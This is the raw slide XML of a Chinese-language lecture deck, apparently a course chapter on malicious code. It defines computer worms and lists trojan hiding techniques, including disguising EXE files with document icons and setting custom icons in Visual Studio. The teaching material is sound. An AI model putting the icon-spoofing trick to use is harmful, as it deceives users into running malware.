            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="6189663"/>
            <a:ext cx="0" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484660" r:id="rId1"/>
    <p:sldLayoutId id="2147484661" r:id="rId2"/>
    <p:sldLayoutId id="2147484662" r:id="rId3"/>
    <p:sldLayoutId id="2147484663" r:id="rId4"/>
    <p:sldLayoutId id="2147484664" r:id="rId5"/>
    <p:sldLayoutId id="2147484665" r:id="rId6"/>
    <p:sldLayoutId id="2147484666" r:id="rId7"/>
    <p:sldLayoutId id="2147484667" r:id="rId8"/>
    <p:sldLayoutId id="2147484668" r:id="rId9"/>
    <p:sldLayoutId id="2147484669" r:id="rId10"/>
    <p:sldLayoutId id="2147484670" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4400" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
          <a:ea typeface="楷体_GB2312"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b="1">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b="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b="1">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0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0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10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12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76.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7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9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9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9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19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19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19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19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hyperlink" Target="https://github.com/Zeex/subhook/blob/master/subhook_x86.c" TargetMode="External"/><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141.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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1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21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51.jp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22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image" Target="../media/image165.png"/></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webp"/><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8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wmf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1741132"/>
            <a:ext cx="6591300" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第 十七 章    恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="bd04940_"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4453303" y="3821723"/>
            <a:ext cx="2710594" cy="1881554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119553" y="3915507"/>
            <a:ext cx="2590800" cy="1600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3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="3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45E55CF-8948-4B78-9D5F-D6BA6762516A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638176" y="1404261"/>
            <a:ext cx="7772400" cy="4591804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>计算机蠕虫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>一种可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>独立运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过网络传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>具有计算机病毒的一些特性，如传播性、隐蔽性、破坏性等，但蠕虫也具有自己的特点，如漏洞依赖性等，需要通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络系统漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行传播，另外蠕虫也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不需要宿主文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，有的蠕虫甚至只存在于内存中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2A1F5B-1164-4D51-9F15-48EAB571FE80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194823012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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马的隐藏技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175" y="1590675"/>
            <a:ext cx="7643813" cy="4048125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马的隐藏技术：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启动隐藏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录隐藏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进程隐藏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 6" descr="11672027658129111328290816635.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5462588" y="1800225"/>
            <a:ext cx="2649537" cy="4000500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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16924" y="1491101"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐藏自己，使得目标主机加载运行木马程序，而不被用户发现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前面介绍的各种木马自动加载技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前面介绍的无文件木马，通过其它软件来触发执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>诱骗用户点击运行：如文件类型图标欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、启动隐藏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296189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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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2">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grpId="0"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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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2">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812" y="1229656"/>
            <a:ext cx="7772400" cy="1226507"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>用文档类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>doc/docx/txt/jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>等）图标来隐藏可执行文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）来欺骗受害者点击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件类型图标诱骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="879529" y="4760365"/>
            <a:ext cx="7398133" cy="1265511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="879530" y="2790496"/>
            <a:ext cx="7398133" cy="1841938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3294993"/>
            <a:ext cx="851338" cy="977462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="945985" y="5281448"/>
            <a:ext cx="5675531" cy="394138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313069522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1510987" y="2505348"/>
            <a:ext cx="4724400" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611517" y="1286149"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Visual Studio 2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>编写软件时指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件的自定义图标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
